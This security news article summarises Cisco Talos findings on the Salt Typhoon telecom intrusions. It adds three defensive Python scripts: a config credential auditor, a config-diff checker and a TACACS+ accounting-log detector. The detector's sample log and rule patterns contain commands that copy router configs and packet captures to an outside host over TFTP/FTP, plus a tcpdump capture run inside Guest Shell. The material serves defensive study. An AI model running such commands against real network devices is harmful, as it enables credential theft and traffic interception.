Purloined Credentials
Salt Typhoon relied on using stolen credentials to gain access. While the exact method of initial credential compromise is not apparent, the threat actor actively attempted to get its hands on additional credentials by extracting network device configurations and deciphering weakly encrypted local account passwords. They were also observed capturing SNMP, TACACS, and RADIUS traffic, including secret keys, to enumerate credential details for further infiltration.
Configuration Exfiltration
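The two steps just described, pulling device configurations and recovering the weakly protected account material inside them, are something a defender can audit for before an adversary does. The following script is an added example written for this article; it is not code from the article, from Cisco Talos or from any vendor. It scans a Cisco IOS-style running-config for the material the campaign went after: SNMP community strings (Read/Write ones rated highest), `enable password` instead of `enable secret`, Type 7 (reversible) and Type 0 (cleartext) passwords and AAA keys, and MD5-based Type 5 secrets, while letting Type 8/9 (PBKDF2/scrypt) hashes pass. The sample configuration, hostnames, hashes and Type 7 strings are constructed placeholders; the category names are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    severity: str
    category: str
    text: str  # the offending line with the credential value redacted


# First matching check wins for a line. Type 7 is reversible obfuscation, Type 0
# is cleartext and Type 5 is MD5-based and no longer recommended by Cisco;
# Type 8/9 (PBKDF2/scrypt) lines match none of these and pass.
_CHECKS = [
    (re.compile(r"^snmp-server community \S+ .*\bRW\b", re.I), "high", "snmp-rw-community"),
    (re.compile(r"^snmp-server community \S+", re.I), "medium", "snmp-community"),
    (re.compile(r"^enable password\b"), "high", "enable-password-not-secret"),
    (re.compile(r"\b(password|secret|key) 7 \S+"), "high", "type7-reversible"),
    (re.compile(r"\b(password|key) 0 \S+"), "high", "cleartext"),
    (re.compile(r"^username \S+ password (?!\d )\S+"), "high", "cleartext"),
    (re.compile(r"\bsecret 5 \S+"), "medium", "type5-md5"),
    (re.compile(r"^(tacacs|radius)-server key (?!\d )\S+"), "high", "aaa-key-cleartext"),
]

# Matches the credential value (and optional encryption-type digit) so that the
# audit report does not itself become a copy of the secrets.
_SECRET = re.compile(r"(community |password |secret |key )(\d )?\S+")


def _redact(line: str) -> str:
    return _SECRET.sub(r"\1\2<redacted>", line, count=1)


def audit_config(config: str) -> list:
    """Return one Finding per config line carrying weakly protected credential material."""
    findings = []
    for no, raw in enumerate(config.splitlines(), start=1):
        line = raw.strip()
        for pattern, severity, category in _CHECKS:
            if pattern.search(line):
                findings.append(Finding(no, severity, category, _redact(line)))
                break
    return findings


def summarize(findings) -> dict:
    """Count findings per severity, e.g. {'high': 6, 'medium': 2}."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample running-config excerpt; the hashes and Type 7 strings are
# placeholders, not real credentials.
SAMPLE_CONFIG = """\
hostname EDGE-RTR1
enable password cisco123
username admin password 7 0822455D0A16
username svc-backup secret 5 $1$abcd$placeholderplaceholder
username netops secret 9 $9$placeholder/hash
snmp-server community public RO
snmp-server community private RW
tacacs-server host 10.0.0.5
tacacs-server key 7 1511021F0725
radius-server key RadiusPlain123
ip ftp password 7 05080F1C2243
"""

if __name__ == "__main__":
    findings = audit_config(SAMPLE_CONFIG)
    for f in findings:
        print(f"line {f.line_no:>3} [{f.severity:<6}] {f.category}: {f.text}")
    print(summarize(findings))
```

Run against configuration backups as well as live devices: the article's point is that the copies exfiltrated over TFTP/FTP carried the same material, so anything this audit flags should be treated as already exposed if a backup store or a device was reachable by the intruder.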
In many instances, the threat actor exfiltrated device configurations using TFTP and FTP—configurations that often contained sensitive authentication material, such as SNMP Read/Write (R/W) community strings and weakly encrypted local account passwords. Malefactors could trivially decrypt these passwords offline, and the configurations also provided insights into network infrastructure, enabling reconnaissance and lateral movement.
Infrastructure Pivoting
A hallmark of this campaign was the actor’s ability to pivot through compromised infrastructure. By using machine-to-machine connections, it maintained a presence within trusted infrastructure, slipping past network security measures. Salt Typhoon also used compromised devices from one telecom provider as hop points to target infrastructure at another provider. Some of these hop points were also used for outbound data exfiltration, exploiting network equipment from multiple manufacturers.
Configuration Modification
The actor also altered device running configurations and subsystems associated with Bash and Guest Shell, a Linux-based virtual environment on Cisco devices. The observed modifications included:
- AAA/TACACS+ server modifications (IP address changes)
- Loopback interface IP modifications
- GRE tunnel creation and use
- Unexpected local account creation
- ACL modifications
- SNMP community string modifications
- HTTP/HTTPS server modifications on standard and non-standard ports
- Shell access modifications (Guest Shell enable/disable, alternate SSH servers on high ports, Linux-level user creation, modification of /etc/shadow and /etc/passwd, and adding SSH authorized keys under root or other users)
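Every item in the list above is a change to the running configuration, which means a diff against a known-good snapshot will surface it. The script below is an added example, not code from the article or from Cisco Talos, showing how to attribute each added or removed line to one of the listed modification types (AAA server, loopback IP, tunnel interface, local account, ACL, SNMP community, HTTP server, shell access). It parses IOS-style configs so that indented lines keep their section header as context, which is what lets a changed `ip address` under `interface Loopback0` be told apart from one under a tunnel. The two configuration snapshots, hostnames, addresses and hashes are constructed placeholders; `/etc/passwd`-level changes inside Guest Shell are outside the running-config and are not covered here.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Change:
    kind: str      # "+" only in the current config, "-" only in the baseline
    category: str
    context: str   # enclosing section header, "" for global commands
    line: str


def _parse(config: str) -> set:
    """Return (context, line) pairs; indented lines carry their section header
    so a change is attributed to the interface/ACL/server block it belongs to."""
    entries, context = set(), ""
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw[0] not in " \t":
            context = raw.strip()
            entries.add(("", context))
        else:
            entries.add((context, raw.strip()))
    return entries


def _category(ctx: str, line: str) -> str:
    """Map a changed line to one of the modification types listed in the article."""
    ctx_l = ctx.lower()
    bare = line[3:] if line.startswith("no ") else line  # "no ip http server" is still an HTTP change
    bare_l = bare.lower()
    text = f"{ctx_l} {bare_l}"
    if ctx_l.startswith("interface loopback") and bare_l.startswith("ip address"):
        return "loopback-ip"
    if ctx_l.startswith("interface tunnel") or bare_l.startswith(("interface tunnel", "tunnel ")):
        return "tunnel-interface"
    if "tacacs" in text or "radius" in text:
        return "aaa-server"
    if bare_l.startswith("username "):
        return "local-account"
    if bare_l.startswith("snmp-server community"):
        return "snmp-community"
    if bare_l.startswith("ip http"):
        return "http-server"
    if "access-list" in text:
        return "acl"
    if bare_l.startswith(("iox", "app-hosting", "ip ssh port")):
        return "shell-access"
    return "other"


def diff_configs(baseline: str, current: str) -> list:
    """Lines removed from or added to the baseline, each tagged with a category."""
    before, after = _parse(baseline), _parse(current)
    changes = [Change("-", _category(c, l), c, l) for c, l in sorted(before - after)]
    changes += [Change("+", _category(c, l), c, l) for c, l in sorted(after - before)]
    return changes


def count_by_category(changes) -> dict:
    counts = {}
    for ch in changes:
        counts[ch.category] = counts.get(ch.category, 0) + 1
    return counts


# Constructed "known-good" snapshot and a later snapshot of the same device;
# addresses and hashes are placeholders.
BASELINE_CONFIG = """\
hostname EDGE-RTR1
username netops secret 9 $9$placeholder1
interface Loopback0
 ip address 10.255.0.1 255.255.255.255
ip access-list extended MGMT
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
 deny ip any any
snmp-server community mon-ro RO
tacacs-server host 10.0.0.5
no ip http server
no ip http secure-server
"""

CURRENT_CONFIG = """\
hostname EDGE-RTR1
username netops secret 9 $9$placeholder1
username svc-tmp privilege 15 secret 9 $9$placeholder2
interface Loopback0
 ip address 198.51.100.7 255.255.255.255
interface Tunnel1
 ip address 172.31.0.1 255.255.255.252
 tunnel source Loopback0
 tunnel destination 203.0.113.10
 tunnel mode gre ip
ip access-list extended MGMT
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
 permit tcp host 203.0.113.10 any
 deny ip any any
snmp-server community mon-ro RO
snmp-server community upd-rw RW
tacacs-server host 10.0.0.5
tacacs-server host 203.0.113.20
iox
ip ssh port 44022 rotary 1
no ip http server
ip http secure-server
ip http secure-port 8443
"""

if __name__ == "__main__":
    for ch in diff_configs(BASELINE_CONFIG, CURRENT_CONFIG):
        where = f"{ch.context} / " if ch.context else ""
        print(f"{ch.kind} [{ch.category}] {where}{ch.line}")
```

In practice the baseline comes from a configuration management system and the current snapshot from a scheduled `show running-config` pull; any change outside an approved change window, and any hit in the `local-account`, `tunnel-interface`, `shell-access` or `aaa-server` categories, is worth an immediate look.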
Packet Capture Techniques
Various tools and techniques were used to capture packet data, including:
- Tcpdump – A command-line utility for packet capture at the OS level.
- Tpacap – A Cisco IOS XR utility capturing interface-specific traffic.
- Embedded Packet Capture (EPC) – A Cisco IOS feature enabling packet capture and export.
- JumbledPath – A custom-built tool enabling remote packet capture through jump hosts while obfuscating source and destination information.
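Three of the four capture methods above, and the TFTP/FTP configuration pulls described earlier, are driven from the device command line, so TACACS+ command accounting is the natural place to catch them. The following detector is an added example written for this article, not code from the article or from Cisco Talos. It parses command-accounting records in a format loosely modelled on a TACACS+ server's accounting log (the exact layout is an assumption; adapt the record regex to your server) and flags Embedded Packet Capture commands, OS-level `tcpdump`/`tpacap` invocations, Guest Shell use, configuration copies, and transfers to TFTP/FTP destinations. A command can trip several rules, and every matching rule is reported. The log lines, device and user names are constructed samples.

```python
import re
from dataclasses import dataclass

# Record layout assumed for this example:
# <Mon DD HH:MM:SS> <device> <user> <tty> <source-ip> <start|stop> <attr=value ...>
_RECORD = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<device>\S+) (?P<user>\S+) "
    r"(?P<tty>\S+) (?P<src>\S+) (?P<rec>start|stop) (?P<attrs>.*)$"
)
_CMD = re.compile(r"\bcmd=(.*)$")

# Each rule names a behaviour from the campaign write-up.
_RULES = [
    ("epc-capture", re.compile(r"^monitor capture\b")),
    ("os-level-capture", re.compile(r"\b(tcpdump|tpacap)\b")),
    ("guest-shell", re.compile(r"^guestshell\b")),
    ("config-copy", re.compile(r"^copy\b.*\b(running|startup)-config\b")),
    ("remote-transfer", re.compile(r"\b(tftp|ftp)://")),
]


@dataclass(frozen=True)
class Alert:
    timestamp: str
    device: str
    user: str
    source: str
    rules: tuple
    command: str


def detect(log_text: str) -> list:
    """Return an Alert for every accounted command that matches at least one rule."""
    alerts = []
    for raw in log_text.splitlines():
        m = _RECORD.match(raw)
        if not m:
            continue  # not a command-accounting record we understand
        cmd_m = _CMD.search(m["attrs"])
        if not cmd_m:
            continue
        cmd = cmd_m.group(1).strip()
        hits = tuple(name for name, pattern in _RULES if pattern.search(cmd))
        if hits:
            alerts.append(Alert(m["ts"], m["device"], m["user"], m["src"], hits, cmd))
    return alerts


def by_user(alerts) -> dict:
    """Alert count per account, useful for spotting a newly created local user."""
    counts = {}
    for a in alerts:
        counts[a.user] = counts.get(a.user, 0) + 1
    return counts


# Constructed sample accounting records; 203.0.113.10 stands in for an
# untrusted source address, netops/svc-tmp are made-up accounts.
SAMPLE_ACCOUNTING_LOG = """\
Feb 20 10:01:12 edge-rtr1 netops tty2 10.10.5.5 stop task_id=41 service=shell priv-lvl=15 cmd=show ip interface brief
Feb 20 10:02:40 edge-rtr1 netops tty2 10.10.5.5 stop task_id=42 service=shell priv-lvl=15 cmd=monitor capture CAP interface GigabitEthernet0/0/0 both
Feb 20 10:03:05 edge-rtr1 netops tty2 10.10.5.5 stop task_id=43 service=shell priv-lvl=15 cmd=monitor capture CAP export tftp://203.0.113.10/cap.pcap
Feb 20 10:04:30 edge-rtr1 svc-tmp tty3 203.0.113.10 stop task_id=44 service=shell priv-lvl=15 cmd=guestshell run tcpdump -i eth0
Feb 20 10:05:01 edge-rtr1 svc-tmp tty3 203.0.113.10 stop task_id=45 service=shell priv-lvl=15 cmd=copy running-config ftp://203.0.113.10/r1.cfg
Feb 20 10:06:00 edge-rtr1 netops tty2 10.10.5.5 stop task_id=46 service=shell priv-lvl=15 cmd=show version
"""

if __name__ == "__main__":
    alerts = detect(SAMPLE_ACCOUNTING_LOG)
    for a in alerts:
        print(f"{a.timestamp} {a.device} {a.user}@{a.source} {','.join(a.rules)}: {a.command}")
    print(by_user(alerts))
```

Command accounting only helps if it is actually sent off-box and retained; the article's observation that the actor modified AAA/TACACS+ server addresses is a reminder to alert on those changes too, since redirecting accounting is the simplest way to blind this detection.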
No New Cisco Vulnerabilities Discovered
Despite reports suggesting that Salt Typhoon might have exploited other Cisco vulnerabilities, Cisco Talos says it has found no evidence confirming these claims. The vulnerabilities in question, which already have security fixes available, include:
- CVE-2018-0171 – Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability
- CVE-2023-20198, CVE-2023-20273 – Multiple vulnerabilities in Cisco IOS XE Software Web UI Feature
- CVE-2024-20399 – Cisco NX-OS Software CLI Command Injection Vulnerability
Patch Before it’s Too Late
Cisco Talos stresses that patching these vulnerabilities is critical, as bad actors often use publicly available malicious tools to exploit unpatched systems. It advises all infrastructure defenders—not only those in the telecoms sector—to stick to best practices for securing network infrastructure. Darren Guccione, CEO and Co-Founder at Keeper Security, adds: “Effective cybersecurity isn’t just about sealing off the front door – it requires vigilance in closing known security gaps and limiting damage when defenses fail.” He advises telecom providers and other critical infrastructure to take a layered approach that includes zero trust, least-privilege access and Privileged Access Management (PAM). “PAM helps restrict lateral movement by securing and limiting access to critical systems, making it significantly harder for attackers to persist and minimizing the impact of a breach. By securing critical accounts and restricting lateral movement, organizations can make it significantly harder for adversaries to maintain control over time.”
A Wake-up Call for the Industry
Rom Carmel, Co-Founder and CEO at Apono, says this incident is another wake-up call for the industry: “Legacy security gaps are still being exploited, and traditional perimeter-based defenses are no longer enough. Time and again, we see everyone from criminal gangs to APTs using tried-and-true methods like stolen credentials and known vulnerabilities to gain footholds, escalate privileges, and access sensitive resources. As organizations expand their cloud footprint, their identity attack surface grows, offering hackers more opportunities to exploit security gaps.”
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.